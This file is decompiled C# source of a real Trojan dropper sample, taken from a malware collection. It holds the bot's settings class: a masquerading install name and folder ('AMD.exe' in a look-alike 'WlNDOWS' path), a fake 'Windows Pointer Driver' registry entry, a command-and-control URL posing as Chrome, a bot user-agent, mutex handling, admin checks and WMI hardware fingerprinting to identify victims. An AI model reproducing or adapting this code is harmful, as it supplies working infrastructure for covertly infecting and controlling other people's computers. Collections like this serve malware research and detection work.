MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc/Base_Settings.cs

// Decompiled with JetBrains decompiler
// Type: Poly.Base_Settings
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe

using System;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;

namespace Poly
{
  public class Base_Settings
  {
    private const uint LOCALE_SENGCOUNTRY = 4098;
    public static bool install = true;
    public static bool mutexRunning;
    public static bool captured;
    public static bool isAdmin;
    public static bool busy = false;
    public static string mutex0 = "0x110110xx";
    public static string filePath;
    public static string fileName = "AMD.exe";
    public static string AppDataRoam;
    public static string AppDataLocal;
    public static string FolderName = "\\WlNDOWS\\";
    public static string regName = "Windows Pointer Driver";
    public static string userAgent = "s00tb0t";
    public static string httpURL = "http://www.chr0me.com/about.php";
    public static string status;
    public static string pcName;
    public static string hwid;
    public static string os;
    public static string[] response;
    public static string command;
    public static int mode = 0;
    public static int interval = 40;
    private Mutex mutex;
    public static bool wait = true;

    public virtual void Initialise()
    {
      int num = 0;
      while (Base_Settings.wait)
      {
        Base_Settings.mutexRunning = this.MutexRunning();
        if (num > 5)
          Environment.Exit(0);
        else if (Base_Settings.mutexRunning)
        {
          Console.WriteLine("Do shit... {0}", (object) num);
          Base_Settings.status = "Mutex detected";
          Thread.Sleep(2000);
        }
        else if (!Base_Settings.mutexRunning)
        {
          Console.WriteLine("Shit done.. Mutex gone");
          Base_Settings.status = "updated";
          Base_Settings.wait = false;
          this.populateEnvVar();
        }
        ++num;
      }
    }

    public virtual void Run()
    {
    }

    private void populateEnvVar()
    {
      Base_Settings.pcName = Environment.MachineName;
      Base_Settings.AppDataRoam = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
      Base_Settings.AppDataLocal = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
      Base_Settings.isAdmin = Base_Settings.getAdminStatus();
      Base_Settings.filePath = Base_Settings.AppDataLocal + Base_Settings.FolderName;
      this.DetectOS();
      Base_Settings.hwid = this.getUniqueID();
      Console.WriteLine("Successfully initialised Settings");
      Console.Write("hwid is: {0}\nos is: {1}\n", (object) Base_Settings.hwid, (object) Base_Settings.os);
    }

    private bool MutexRunning()
    {
      try
      {
        this.mutex = Mutex.OpenExisting(Base_Settings.mutex0);
        Console.WriteLine("Mutex Detected");
        return true;
      }
      catch
      {
        this.mutex = new Mutex(true, Base_Settings.mutex0);
        return false;
      }
    }

    public static bool isExePath() => !(Process.GetCurrentProcess().MainModule.FileName != Base_Settings.filePath + Base_Settings.fileName);

    public static bool getAdminStatus()
    {
      try
      {
        return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
      }
      catch
      {
        return false;
      }
    }

    public string getUniqueID() => Function.MD5Hash((this.getCPUID() + this.getGraphicDevice()).ToString());

    private string getCPUID()
    {
      ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Processor WHERE DeviceID = 'CPU0'");
      string empty = string.Empty;
      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
        empty = Convert.ToString(managementBaseObject["ProcessorId"]);
      return empty;
    }

    private string getGraphicDevice()
    {
      ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController");
      string empty = string.Empty;
      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
        empty = Convert.ToString(managementBaseObject["Description"]);
      return empty;
    }

    private void DetectOS()
    {
      OperatingSystem osVersion = Environment.OSVersion;
      string str = "";
      if (osVersion.Platform.ToString() == "Win32NT")
      {
        switch (Base_Settings.OSVersionNoRevision(osVersion.Version))
        {
          case "4.1.2222":
            str = "Windows 98 ";
            break;
          case "4.1.2600":
            str = "Windows 98 SE ";
            break;
          case "4.9.3000":
            str = "Windows ME ";
            break;
          case "5.0.2195":
            str = "Windows 2000 ";
            break;
          case "5.1.2600":
          case "5.2.3790":
            str = "Windows XP ";
            break;
          case "6.0.6000":
          case "6.0.6001":
          case "6.0.6002":
          case "6.0.6003":
            str = "Windows Vista ";
            break;
          case "6.1.7600":
          case "6.1.7601":
          case "6.1.7602":
          case "6.1.7603":
            str = "Windows 7 ";
            break;
          default:
            str = "Unknown ";
            break;
        }
      }
      string empty = string.Empty;
      API.OSVERSIONINFOEX osVersionInfo = new API.OSVERSIONINFOEX();
      osVersionInfo.dwOSVersionInfoSize = Marshal.SizeOf(typeof (API.OSVERSIONINFOEX));
      if (API.GetVersionEx(ref osVersionInfo))
      {
        if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP1]"))
        {
          str += "[SP1]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP2]"))
            str += "[SP2]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP3]"))
            str += "[SP3]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP4]"))
            str += "[SP4]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP5]"))
            str += "[SP5]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP6]"))
            str += "[SP6]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP7]"))
            str += "[SP7]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP8]"))
            str += "[SP8]";
          if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP9]"))
            str += "[SP9]";
        }
        Base_Settings.os = !Base_Settings.is64Bit() ? str + "(32-bit)" : str + "(64-bit)";
      }
      else
        Base_Settings.os = str;
    }

    private static string OSVersionNoRevision(Version ver) => ver.Major.ToString() + "." + ver.Minor.ToString() + "." + ver.Build.ToString();

    public static void cleanUp() => Environment.Exit(0);

    private static bool is64Bit()
    {
      try
      {
        return !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("ProgramW6432"));
      }
      catch
      {
        return false;
      }
    }

    public static string GetLocale() => API.GetInfo(4098U);
  }
}